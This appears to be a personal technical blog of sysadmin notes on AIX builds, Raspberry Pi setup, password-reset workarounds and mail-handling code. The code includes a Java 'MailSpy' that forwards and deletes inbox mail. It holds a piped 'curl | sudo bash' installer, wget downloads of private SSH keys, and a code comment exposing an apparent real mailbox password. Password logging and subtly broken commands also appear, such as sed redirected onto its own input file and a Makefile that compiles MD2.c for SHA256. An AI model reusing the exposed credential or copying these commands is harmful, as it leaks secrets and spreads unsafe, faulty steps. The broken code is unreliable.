    curl -s https://pagekite.net/pk/ |sudo bash
    pagekite.py --signup
    pagekite.py 5000 mypi.pagekite.me

Reference

https://github.com/amitsaha/raspi-guide/blob/master/doc/install.rst
http://echorand.me/2012/10/13/web-based-ssh-access-to-your-raspberry-pi/
http://www.vpsee.com/2013/06/invoke-a-linux-shell-with-ssh-account-from-browser/

Build pycrypto in AIX

  • Download pycrypto-2.6.1 from https://www.dlitz.net/software/pycrypto/

  • Unzip pycrypto tar xzvf pycrypto-2.6.1.tar.gz

  • set environment vairable and build source code export ac_cv_func_malloc_0_nonnull=yes(It would throw Error “undefined symbol rpl_malloc”) python setup.py buildRefer to iperf-for-arm-cross-compile and openwrt

  • Download dependencies and install them http://www.bullfreeware.com/recherche.php

    • gmp-devel-5.1.3-1.aix6.1.ppc.rpm
      http://www.perzl.org/aix/index.php
    • libtomcrypt-1.17-1.aix5.1.ppc.rpm
    • libtomcrypt-devel-1.17-1.aix5.1.ppc.rpm
    • libtommath-0.42.0-1.aix5.1.ppc.rpm
  • Makefile as below

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    CC=gcc
    CFLAGS=-pthread -fno-strict-aliasing -fwrapv -Wall -Wstrict-prototypes -fPIC -std=c99 -O3 -fomit-frame-pointer -Isrc/ -I/opt/freeware/include/python2.7 -c
    LDFLAGS=-pthread -shared -lpython2.7
    OBJ_DIR=build/temp.aix-7.1-2.7/src
    SO_DIR=build/lib.aix-7.1-2.7/Crypto

    all:
    echo "building 'Crypto.PublicKey._fastmath' extension"
    $(CC) $(CFLAGS) src/_fastmath.c -o $(OBJ_DIR)/fastmath.o
    $(CC) $(LDFLAGS) -lgmp -lm $(OBJ_DIR)/fastmath.o -o $(SO_DIR)/PublicKey/_fastmath.so (added -lgmp -lm)

    echo "building 'Crypto.Hash._MD2' extension"
    $(CC) $(CFLAGS) src/MD2.c -o $(OBJ_DIR)/MD2.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/MD2.o -o $(SO_DIR)/Hash/_MD2.so

    echo "building 'Crypto.Hash._SHA256' extension"
    $(CC) $(CFLAGS) src/MD2.c -o $(OBJ_DIR)/SHA256.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/MD2.o -o $(SO_DIR)/Hash/_SHA256.so

    echo "building 'Crypto.Hash._SHA224' extension"
    $(CC) $(CFLAGS) src/SHA224.c -o $(OBJ_DIR)/SHA224.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/SHA224.o -o $(SO_DIR)/Hash/_SHA224.so

    echo "building 'Crypto.Hash._SHA384' extension"
    $(CC) $(CFLAGS) src/SHA384.c -o $(OBJ_DIR)/SHA384.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/SHA384.o -o $(SO_DIR)/Hash/_SHA384.so

    echo "building 'Crypto.Hash._SHA512' extension"
    $(CC) $(CFLAGS) src/SHA512.c -o $(OBJ_DIR)/SHA512.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/SHA512.o -o $(SO_DIR)/Hash/_SHA512.so

    echo "building 'Crypto.Hash._RIPEMD160' extension"
    $(CC) $(CFLAGS) src/RIPEMD160.c -o $(OBJ_DIR)/RIPEMD160.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/RIPEMD160.o -o $(SO_DIR)/Hash/_RIPEMD160.so

    echo "building 'Crypto.Cipher._AES' extension"
    $(CC) $(CFLAGS) src/AES.c -o $(OBJ_DIR)/AES.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/AES.o -o $(SO_DIR)/Cipher/_AES.so

    echo "building 'Crypto.Cipher._ARC2' extension"
    $(CC) $(CFLAGS) src/ARC2.c -o $(OBJ_DIR)/ARC2.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/ARC2.o -o $(SO_DIR)/Cipher/_ARC2.so

    echo "building 'Crypto.Cipher._Blowfish' extension"
    $(CC) $(CFLAGS) src/Blowfish.c -o $(OBJ_DIR)/Blowfish.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/Blowfish.o -o $(SO_DIR)/Cipher/_Blowfish.so

    echo "building 'Crypto.Cipher._CAST' extension"
    $(CC) $(CFLAGS) src/CAST.c -o $(OBJ_DIR)/CAST.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/CAST.o -o $(SO_DIR)/Cipher/_CAST.so

    echo "building 'Crypto.Cipher._DES' extension"
    $(CC) $(CFLAGS) -I/opt/freeware/include/tomcrypt src/DES.c -o $(OBJ_DIR)/DES.o (added -I/opt/freeware/include/tomcrypt)
    $(CC) $(LDFLAGS) -ltomcrypt $(OBJ_DIR)/DES.o -o $(SO_DIR)/Cipher/_DES.so (added -ltomcrypt)

    echo "building 'Crypto.Cipher._DES3' extension"
    $(CC) $(CFLAGS) -I/opt/freeware/include/tomcrypt src/DES3.c -o $(OBJ_DIR)/DES3.o (added -I/opt/freeware/include/tomcrypt)
    $(CC) $(LDFLAGS) -ltomcrypt $(OBJ_DIR)/DES3.o -o $(SO_DIR)/Cipher/_DES3.so (added -ltomcrypt)

    echo "building 'Crypto.Cipher._ARC4' extension"
    $(CC) $(CFLAGS) src/ARC4.c -o $(OBJ_DIR)/ARC4.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/ARC4.o -o $(SO_DIR)/Cipher/_ARC4.so

    echo "building 'Crypto.Cipher._XOR' extension"
    $(CC) $(CFLAGS) src/XOR.c -o $(OBJ_DIR)/XOR.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/XOR.o -o $(SO_DIR)/Cipher/_XOR.so

    echo "building 'Crypto.Util.strxor' extension"
    $(CC) $(CFLAGS) src/strxor.c -o $(OBJ_DIR)/strxor.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/strxor.o -o $(SO_DIR)/Util/strxor.so

    echo "building 'Crypto.Util._counter' extension"
    $(CC) $(CFLAGS) src/_counter.c -o $(OBJ_DIR)/counter.o
    $(CC) $(LDFLAGS) $(OBJ_DIR)/counter.o -o $(SO_DIR)/Util/_counter.so

Install gevent in AIX with gcc

greenlet

Download greenlet-0.4.1.zip from https://github.com/python-greenlet/greenlet

1
2
3
sudo gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fPIC -fno-tree-dominator-opts -I. -I/opt/freeware/include/python2.7 -c greenlet.c -o build/greenlet.o
sudo gcc -shared -lpthreads -lpython2.7 -o build/greenlet.so build/greenlet.o
sudo cp build/greenlet.so /opt/freeware/lib/python2.7/site-packages/

libev

Download libev-4.15.tar.gz from http://dist.schmorp.de/libev/

1
2
./configure --prefix=/usr/local/libev
gmake && sudo gmake install

c-ares

Download c-ares from http://c-ares.haxx.se/

1
2
./configure --prefix=/usr/local/c-ares
gmake && sudo gmake install

Or just run
run configure CONFIG_COMMANDS= CONFIG_FILES=

gevent

2.build share object

1
2
gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fPIC -fno-tree-dominator-opts -I/opt/freeware/include/python2.7 -Ic-ares gevent/gevent.ares.c -c -o build/gevent/gevent.ares.o
gcc -pthread -shared -lpython2.7 -L/home/sms_dev/soft/usr/local/c-ares/lib -lcares -lrt -o build/gevent/ares.so build/gevent/gevent.ares.o
  • build semaphore.so

    1
    2
    sudo gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fPIC -fno-tree-dominator-opts -I/opt/freeware/include/python2.7 gevent/gevent.**semaphore.c -c -o build/gevent/gevent.**semaphore.o 
    gcc -pthread -shared -lpython2.7 build/gevent/gevent.**semaphore.o -o build/gevent/**semaphore.so
  • build **util.so

    1
    2
    sudo gcc -pthread -fno-strict-aliasing -DNDEBUG -g -fwrapv -O2 -Wall -Wstrict-prototypes -fPIC -fno-tree-dominator-opts -I/opt/freeware/include/python2.7 gevent/gevent.**util.c -c -o build/gevent/gevent._util.o 
    gcc -pthread -shared -lpython2.7 build/gevent/gevent.**util.o -o build/gevent/**util.so

Reference:

Linux 的 .a / .so / .la 函式庫的差異
问个.a和.so的区别
Linux下静态链接库与动态链接库的区别
凡你醉处 你说过 皆非他乡
淺談coroutine與gevent

Reset password through web console

I have a web console in AIX, but | (pipe stream), &raquo; and > do not work. How can I reset my password for account xx.

method 1

1
2
3
4
5
6
7
mkdir /home/xx/.ssh
ssh-keygen -t rsa -P password -f /home/xx/.ssh/id_rsa (ssh-keygen -t rsa -P '' -f /home/xx/.ssh/id_rsa not work since no passphase)
cp id_rsa.pub authorized_keys
chmod 600 /home/xx/.ssh/authorized_keys
chown -R xx:sms /home/xx/.ssh
chmod 700 /home/xx/.ssh
cat /home/xx/.ssh/id_rsa(then copy and paste in web console, save as id_rsa, then save as private key in putty)

method 2

1
2
3
4
5
6
rpm or download **wget** prepare id_rsa, id_rsa.pub, authorized_keys
/home/xx/soft/usr/local/bin/wget -O /home/xx/.ssh/id_rsa http://10.13.135.40:8080/dh/keygen/id_rsa
/home/xx/soft/usr/local/bin/wget -O /home/xx/.ssh/id_rsa.pub http://10.13.135.40:8080/dh/keygen/id_rsa.pub
/home/xx/soft/usr/local/bin/wget -O /home/xx/.ssh/authorized_keys http://10.13.135.40:8080/dh/keygen/authorized_keys
chown -R xx:sms /home/xx/.ssh
chmod 700 /home/xx/.ssh

method 3 (fail in AIX)

1
2
echo "xx1234\nxx1234" | (passwd -stdin xx)
echo -e "xx1234\nxx1234" | (passwd -stdin xx) – in Linux

method 4 (fail in AIX)

echo "xx:xx1234" | chpasswd -c

method 5

download expect package from http://www.oss4aix.org/download/RPMS/

1
2
3
4
5
6
7
8
9
rpm -ivh libpng-1.6.7-1.aix5.1.ppc.rpm
rpm -ivh zlib-1.2.8-1.aix5.1.ppc.rpm
rpm -ivh bzip2-1.0.6-1.aix5.1.ppc.rpm
rpm -ivh freetype2-2.5.2-1.aix5.1.ppc.rpm
rpm -ivh expat-2.1.0-1.aix5.1.ppc.rpm
rpm -ivh fontconfig-2.10.2-1.aix5.1.ppc.rpm
rpm -ivh tk-8.5.15-1.aix5.1.ppc.rpm
rpm -ivh tcl-8.5.15-1.aix5.1.ppc.rpm
rpm -ivh expect-5.45-1.aix5.1.ppc.rpm

write expect script /home/xx/chpass.sh

1
2
3
4
5
6
#!/usr/bin/expect
spawn passwd support
expect "*password*"
send "xx1234\n"
expect "*password*"
send "xx1234\n" exit

Others

I try different account to login system, grant sudo right to this account, change the password using pwdadm and passwd, but when I login with putty, found that Access denied. When I run su - user, found “3004-303 There have been too many unsuccessful login attempts; please see the system administrator”, found the root cause, after google, easy two steps can sovle it.

1
2
- /usr/sbin/lsuser -a unsuccessful_login_count user
- /usr/bin/chsec -f /etc/security/lastlog -a unsuccessful_login_count=0 -s user

http://aix4admins.blogspot.hk/2012/06/user-login-process-login-process.html
http://hi.baidu.com/unixsec/item/fa155d8e16cb0cdf5e0ec157"
pwdadm 命令

Ref

expect
expect-lite

What stuff in XBian

  • airplay using ios7
  • chinese environmnet
    • $ sudo apt-get install ttf-wqy-microhei ttf-wqy-zenhei xfonts-wqy
    • $ sudo dpkg-reconfigure locales 將zh_SG.UTF-8設定為預設的locale。
  • sudo apt-get install scim scim-tables-zh scim-pinyin 重開機後,以Ctrl-Space即可切換輸入法,輸入中文。
  • /etc/apt/apt.conf
    1
    2
    Acquire::http::Proxy "http://proxy.server:port";
    Acquire::http::Proxy "http://username:password@proxy.server:port";
  • Download xbmc addons https://code.google.com/p/xbmc-addons-chinese/
  • vnc https://github.com/hanzelpeter/dispmanx_vnc

Reference
http://yehnan.blogspot.hk/2012/08/raspberry-pi.html
http://askubuntu.com/questions/109673/how-to-use-apt-get-via-http-proxy-like-this

hadoop in win7 with cygwin

  • Download ‘setup.exe’ from Cygwin website
  • Download hadoop 0.20.2 and hbase 0.20.6 from apache website
  • Add user hadoop
    1
    2
    3
    $ net user hadoop password /add /yes
    $ net localgroup administrator hadoop /add
    $ mkpassd -l -u hadoop >> /etc/passwd
  • Add sshd service
    1
    2
    3
    $ cygrunsrv.exe –remove sshd (no necessary)
    $ ssh-host-config -y
    $ cygrunsrv.exe –start sshd
  • Generate ssh key
    1
    2
    3
    4
    $ ssh-keygen -t dsa -P '' -f ~/.ssh/id_dsa
    $ cat ~/.ssh/id_dsa.pub &raquo; ~/.ssh/authorized_keys
    $ chmod 600 ~/.ssh/authorized_keys
    $ scp ~/.ssh/id_dsa.pub ~/.ssh/authorized_keys 10.13.136.250:/home/hadoop/.ssh
  • Edit file as below
    • core-site.xml
    • hdfs-site.xml
    • mapred-site.xml
    • hadoop-env.sh

Referece

Cygwin for Hadoop (Win 7)
Setting Up Hadoop 0.20.2 on Windows 7 With Cygwin
Hadoop for Windows using Cygwin

Get back the console in xbian when booting

  • system -> setting -> xbian -> service -> disable xbmc autostart-
  • set parameter in /etc/wpa_supplicant.conf
  • restart wlan0
    1
    2
    3
    # ifconfig wlan0 down
    # ifconfig wlan0 up
    # wpa_supplicant -B -c /etc/wpa_supplicant.conf -i wlan0
  • start xbmc service # sudo service xbmc start or # sudo xbian-config services start xbmc

Encountered problem:

  • showing fs resize and halt in screen

Solution:

  • remove splash and quiet in cmdline.txt

Reference
xbian-config-bash
Install Mercury MW150US WIFI dongle on RPi

Read mails from Outlook using python

code as following

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import win32com.client, sqlite3
from datetime import datetime

def collectMail():
conn = sqlite3.connect('outlook.db')
i = 0
try:
outlook = win32com.client.Dispatch("Outlook.Application").GetNamespace("MAPI")

inbox = outlook.GetDefaultFolder(6)
messages = inbox.Items
print 'total messages: ', len(messages)
message = messages.GetFirst ()
while message:
i += 1
try:
subject = message.Subject
#print i, subject

received_time = str(message.ReceivedTime)
#print received_time
received_time = datetime.strptime(received_time, '%m/%d/%y %H:%M:%S')
#print message.EntryID
html_body = message.HTMLBody
size = long(message.Size)

sender = message.SenderName
receiver = message.To
cc = message.Cc
body = message.Body
conn.execute('insert into outlook(SUBJECT, SENDER, RECEIVER, CC, SIZE, RECEIVED_TIME, BODY, HTML_BODY) values(?, ?, ?, ?, ?, ?, ?, ?)', (subject, sender, receiver, cc, size, received_time, body, html_body))
conn.commit()
except:
print i, 'skip'
continue

message = messages.GetNext()
finally:
print 'connection closed'
conn.close()


collectMail()

sql to create table

1
2
3
4
5
6
7
8
9
10
create table outlook(
ID INTEGER PRIMARY KEY AUTOINCREMENT,
SUBJECT VARCHAR(200) NOT NULL,
SENDER VARCHAR(200) NOT NULL,
RECEIVER VARCHAR(200) NOT NULL,
CC VARCHAR(200) NOT NULL,
SIZE LONG NOT NULL,
RECEIVED_TIME DATETIME,
BODY TEXT,
HTML_BODY TEXT);

Reference

python-script-to-read-the-emails-from-custom-folder-from-microsoft-outlook-mailb
reading-e-mails-from-outlook-with-python-through-mapi
microsoft.office.interop.outlook
sqlite_using_autoincrement

vanish(squid) + HAProxy + nginx + memcached(redis)

1. Load-balance then cache

1
2
3
4
5
                           +-- Cache server #1 (varnish) -- App server #1
/
Load Balancer (haproxy)-+---- Cache server #2 (varnish) -- App server #2
\
+-- Cache server #3 (varnish) -- App server #3

2. Cache then load-balance

1
2
3
4
5
                                                       +-- App server #1
/
Cache Server (varnish) --- Load Balancer (haproxy) --+---- App server #2
\
+-- App server #3

I. stunnel -> vanish -> HAProxy -> nginx -> nodeJS -> memcached(redis) (for sesson storage)
II. nginx (for HTTP compression) –> Varnish cache (for caching) –> HTTP level load balancer (HAProxy, or nginx, or the Varnish built-in) –> webservers.
III. Apache Traffic Server/Squid/Vanish + HAProxy + Nginx + memcached(Redis) (for sesson storage)

Reference:

http://serverfault.com/questions/204025/ordering-1-nginx-2-varnish-3-haproxy-4-webserver
http://yaozb.blog.51cto.com/2762349/793875
http://stackoverflow.com/questions/15448196/haproxy-in-front-of-varnish-or-the-other-way-round
http://blog.exceliance.fr/2012/08/25/haproxy-varnish-and-the-single-hostname-website/
http://serverfault.com/questions/51691/need-haproxy-varnish-nginx-setup-suggestions
https://www.exratione.com/2012/08/websockets-over-ssl-stunnel-varnish-nginx-nodejs/

Install memcached & redis & tokyocabinet & whitedb in AIX

Memcached

  • for GNU make, download gmake from http://www.bullfreeware.com/affichage.php?id=1264

  • Download libevent-2.0.21-stable.tar.gz and memcached-1.4.15.tar.gz from offical website

  • Configure & Install

    1
    2
    ./configure --prefix=/home/action/libevent
    ./configure --with-libevent=/home/action/libevent/ --prefix=/home/action/memcached
  • Rename method

    1
    2
    3
    sed 's/thread_init/thread_init_memcached/g' memcached.h > memcached.h
    sed 's/thread_init/thread_init_memcached/g' memcached.c > memcached.c
    sed 's/thread_init/thread_init_memcached/g' thread.c > thread.c
  • Problem
    Can’t enable threads without the POSIX thread library.

  • Solve
    Remove “-Wl,-rpath,$ledir/lib” in file configure

  • Reference
    AIX 下安装 memcached

Redis

tokyocabinet

  • Download tokyocabinet-1.4.48 from http://fallabs.com/tokyocabinet/
    1
    2
    3
    4
    5
    ./configure --prefix=/home/action/tokyocabinet
    sed 's/-Wl,-soname,libtokyocabinet.so.$(LIBVER)//g' Makefile > Makefile.bak
    mv Makefile.bak Makefile
    gmake
    gmake install

whitedb

  • Download whitedb-0.6.1 from http://whitedb.org
    1
    2
    3
    4
    5
    ./configure --prefix=/home/action/whitedb --with-python // found python binding not work
    sed 's/LIBS = -lm /LIBS = -lm -lpthread /g' Makefile > Makefile.bak
    mv Makefile.bak Makefile
    gmake
    gmake install

Package in my AIX

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
rpm -qa

rsync-3.0.6-1
tcl-8.4.7-3
tk-8.4.7-3
expect-5.42.1-3
bash-4.2-1
AIX-rpm-7.1.1.15-2
gettext-0.17-8
gdbm-1.10-1
libiconv-1.14-1
ncurses-5.9-3
info-5.0-2
readline-6.2-3
sqlite-3.7.15.2-2
gmp-5.1.3-1
db-4.8.24-4
zlib-1.2.5-6
libffi-3.0.9-3
bzip2-1.0.6-2
expat-2.1.0-1
python-2.7.2-3
mpfr-3.1.2-1
libmpc-0.9-1
logrotate-3.8.3-1
libgcc-4.8.1-1
zlib-devel-1.2.5-6
bzip2-devel-1.0.6-2
gcc-4.8.1-1
gcc-cpp-4.8.1-1
libstdc++-4.8.1-1
libstdc++-devel-4.8.1-1
gcc-c++-4.8.1-1
make-3.82-2
popt-1.16-2
coreutils-8.21-1
redis-2.6.16-1
python-memcached-1.53-1
python-devel-2.7.2-3

Install Python in AIX

Download Python

download the archive zip from http://www.bullfreeware.com/affichage.php?id=1495

Install Python

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
rpm -ivh libiconv-1.14-1.aix6.1.ppc.rpm –nodeps // important, otherwise throw error of libintl.so 
rpm -ivh gettext-0.17-8.aix6.1.ppc.rpm –nodeps
rpm -ivh gdbm-1.10-1.aix6.1.ppc.rpm
rpm -ivh ncurses-5.9-3.aix6.1.ppc.rpm
rpm -ivh info-5.0-2.aix6.1.ppc.rpm
rpm -ivh readline-6.2-3.aix6.1.ppc.rpm
rpm -ivh sqlite-3.7.15.2-2.aix6.1.ppc.rpm
rpm -ivh gmp-5.1.3-1.aix6.1.ppc.rpm
rpm -ivh db-4.8.24-4.aix6.1.ppc.rpm
rpm -ivh zlib-1.2.5-6.aix6.1.ppc.rpm
rpm -ivh libffi-3.0.9-3.aix6.1.ppc.rpm
rpm -ivh bzip2-1.0.6-2.aix6.1.ppc.rpm
rpm -ivh expat-2.1.0-1.aix6.1.ppc.rpm
rpm -ivh openssl-1.0.0k-2.aix6.1.ppc.rpm
rpm -ivh python-2.7.2-3.aix6.1.ppc.rpm
rpm -ivh python-devel-2.7.2-3.aix6.1.ppc.rpm

Create Makefile & pyconfig.h (Sovled after install python-devel-2.7.2-3.aix6.1.ppc.rpm)

1
2
mkdir /opt/freeware/lib/python2.7/config touch /opt/freeware/lib/python2.7/config/Makefile
mkdir /opt/freeware/include/python2.7 touch /opt/freeware/include/python2.7/pyconfig.h

Problem solve

  • No module unittest found
  • copy unittest from windows to aix
  • aix not support “O_NOFOLLOW”

mail spy

MailSpy.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
package forest;

import java.io.IOException;
import java.security.Security;
import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
import java.util.Properties;
import java.util.ResourceBundle;
import java.util.logging.FileHandler;
import java.util.logging.Formatter;
import java.util.logging.LogRecord;
import java.util.logging.Logger;

import javax.activation.DataHandler;
import javax.mail.Authenticator;
import javax.mail.Flags;
import javax.mail.Folder;
import javax.mail.Message;
import javax.mail.MessagingException;
import javax.mail.Part;
import javax.mail.PasswordAuthentication;
import javax.mail.Session;
import javax.mail.Store;
import javax.mail.Transport;
import javax.mail.internet.AddressException;
import javax.mail.internet.InternetAddress;
import javax.mail.internet.MimeBodyPart;
import javax.mail.internet.MimeMessage;
import javax.mail.internet.MimeMultipart;

import com.sun.net.ssl.internal.ssl.Provider;

public class MailSpy {
public static Logger log = Logger.getLogger("MailSpy");
private static ResourceBundle mailProperties = ResourceBundle.getBundle("forest.mail");

private static String username;
private static String password;
private static Properties props = new Properties();
private static SimpleDateFormat sf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");

static {
try {
FileHandler fh = new FileHandler(mailProperties.getString("logFile"));
fh.setFormatter(new Formatter() {
@Override
public String format(LogRecord record) {
return String.format("%s [%s] - %s\n", sf.format(record.getMillis()), record.getLevel(), record
.getMessage());
}
});
log.addHandler(fh);
} catch (SecurityException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}

Security.addProvider(new Provider());
System.setProperty("javax.net.ssl.trustStore", mailProperties.getString("jssecacerts"));

for (String key : mailProperties.keySet()) {
props.setProperty(key, mailProperties.getString(key));
}

username = mailProperties.getString("username");
password = mailProperties.getString("password");
}

public static void main(String[] args) {
while (true) {
try {
MailSpy util = new MailSpy();
MailMessage mailMessage = util.getMail();
if (mailMessage != null) {
log.info("foward mail");
util.forwardMail(mailMessage);
}

} catch (Exception e) {
log.severe(e.getMessage());
}

try {
Thread.sleep(10000);
} catch (InterruptedException e) {
e.printStackTrace();
}
}
}

/**
* pharmgeneral@dh.gov.hk pass0424
*/
public void forwardMail(MailMessage mailMessage) throws AddressException, MessagingException {
Session session = Session.getDefaultInstance(props, new MyAuthenticator(username, password));
session.setDebug(false);
MimeMessage msg = new MimeMessage(session);

if (!mailMessage.getBodyPart().isEmpty()) {

MimeMultipart multipart = new MimeMultipart();
for (MimeBodyPart body : mailMessage.getBodyPart()) {
multipart.addBodyPart(body);
}
msg.setContent(multipart);
} else {
msg.setText(mailMessage.getBodyText());
}

//msg.setFrom(new InternetAddress(mailMessage.getFrom()));
msg.setFrom(new InternetAddress(username));

msg.setSender(new InternetAddress(mailMessage.getFrom()));
msg.setRecipients(Message.RecipientType.TO, mailProperties.getString("forwardTo"));
//msg.setRecipients(Message.RecipientType.TO, "PRS2.AP1@hp.com");

log.config("Sender " + mailMessage.getFrom() + ", Cc " + mailProperties.getString("forwardTo"));

msg.setSubject(mailMessage.getSubject());

msg.setSentDate(mailMessage.getSent());
Transport.send(msg);

log.info("subject: " + mailMessage.getSubject() + " is sent.");
}

public MailMessage getMail() {
Session session = Session.getDefaultInstance(props, new MyAuthenticator(username, password));
Store store = null;
MailMessage mailMessage = null;

try {
session.setDebug(false);
store = session.getStore();
store.connect();

Folder folder = store.getFolder("INBOX");
folder.open(Folder.READ_WRITE);

int count = folder.getMessageCount();
if (count == 0) {
log.info("no message");
} else {
mailMessage = new MailMessage();
Message message = folder.getMessage(1);

Object content = message.getContent();

mailMessage.setFrom(InternetAddress.toString(message.getFrom()));

//mailMessage.setReplyTo(InternetAddress.toString(message.getReplyTo()));

//mailMessage.setTo(InternetAddress.toString(message.getRecipients(Message.RecipientType.TO)));

//mailMessage.setCc(InternetAddress.toString(message.getRecipients(Message.RecipientType.CC)));

mailMessage.setSubject(message.getSubject());

mailMessage.setSent(message.getSentDate());

if (content instanceof MimeMultipart) {
MimeMultipart mp = (MimeMultipart) content;
for (int i = 0, n = mp.getCount(); i < n; i++) {

Part part = mp.getBodyPart(i);
DataHandler hd = part.getDataHandler();

MimeBodyPart messageBodyPart = new MimeBodyPart();
messageBodyPart.setDataHandler(new DataHandler(hd.getDataSource()));
mailMessage.getBodyPart().add(messageBodyPart);

/*String disposition = part.getDisposition();
if (disposition == null) {
DataHandler hd = part.getDataHandler();

MimeBodyPart messageBodyPart = new MimeBodyPart();
messageBodyPart.setDataHandler(new DataHandler(hd.getDataSource()));
//messageBodyPart.setFileName(fileName);

mailMessage.getBodyPart().add(messageBodyPart);
}

if ((disposition != null)
&& (disposition.equals(Part.ATTACHMENT) || (disposition.equals(Part.INLINE)))) {
String fileName = part.getFileName();
log.info("file name: " + fileName);
InputStream in = part.getInputStream();

ByteArrayDataSource dataSource = new ByteArrayDataSource(in, part.getContentType());
MimeBodyPart messageBodyPart = new MimeBodyPart();
messageBodyPart.setDataHandler(new DataHandler(dataSource));
messageBodyPart.setFileName(fileName);

mailMessage.getBodyPart().add(messageBodyPart);
}*/
}
} else {
log.info("content of text/plain " + content);
mailMessage.setBodyText(content.toString());
}

message.setFlag(Flags.Flag.DELETED, true);
}

folder.close(true);

} catch (Exception e) {
e.printStackTrace();
} finally {
try {
log.fine("store closed");
store.close();
} catch (MessagingException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
return mailMessage;
}
}

class MyAuthenticator extends Authenticator {
private String username;
private String password;

public MyAuthenticator(String username, String password) {
this.username = username;
this.password = password;
}

protected PasswordAuthentication getPasswordAuthentication() {
MailSpy.log.config("username " + username + " , password " + password);
return new PasswordAuthentication(username, password);
}
}

class MailMessage {
private String from;
private String replyTo;
private String to;
private String cc;
private Date sent;
private String subject;
private String bodyText;
private List<MimeBodyPart> bodyPart = new ArrayList<MimeBodyPart>();

public String getFrom() {
return from;
}

public void setFrom(String from) {
this.from = from;
}

public String getReplyTo() {
return replyTo;
}

public void setReplyTo(String replyTo) {
this.replyTo = replyTo;
}

public String getTo() {
return to;
}

public void setTo(String to) {
this.to = to;
}

public Date getSent() {
return sent;
}

public void setSent(Date sent) {
this.sent = sent;
}

public String getSubject() {
return subject;
}

public void setSubject(String subject) {
this.subject = subject;
}

public String getBodyText() {
return bodyText;
}

public void setBodyText(String bodyText) {
this.bodyText = bodyText;
}

public List<MimeBodyPart> getBodyPart() {
return bodyPart;
}

public void setBodyPart(List<MimeBodyPart> bodyPart) {
this.bodyPart = bodyPart;
}

public String getCc() {
return cc;
}

public void setCc(String cc) {
this.cc = cc;
}

}

mail.properties

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#SMTP
mail.smtp.host=smtpa.host
mail.smtp.socketFactory.class=javax.net.ssl.SSLSocketFactory
mail.smtp.ssl.enable=true
mail.smtp.socketFactory.fallback=false
mail.smtp.port=465
mail.transport.protocol=smtps
mail.smtp.socketFactory.port=465
mail.smtp.auth=true

#POP3
mail.pop3s.host=pop3.host
mail.pop3.socketFactory.class=javax.net.ssl.SSLSocketFactory
mail.pop3.ssl.enable=true
mail.pop3.socketFactory.fallback=false
mail.pop3s.port=995
mail.store.protocol=pop3s
mail.pop3.socketFactory.port=995
mail.pop3s.auth=true

username=abc@abc.com
password=password
forwardTo=xyz@xyz.com

logFile=c:/mail.log
jssecacerts=jssecacerts

using cx_Oracle

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
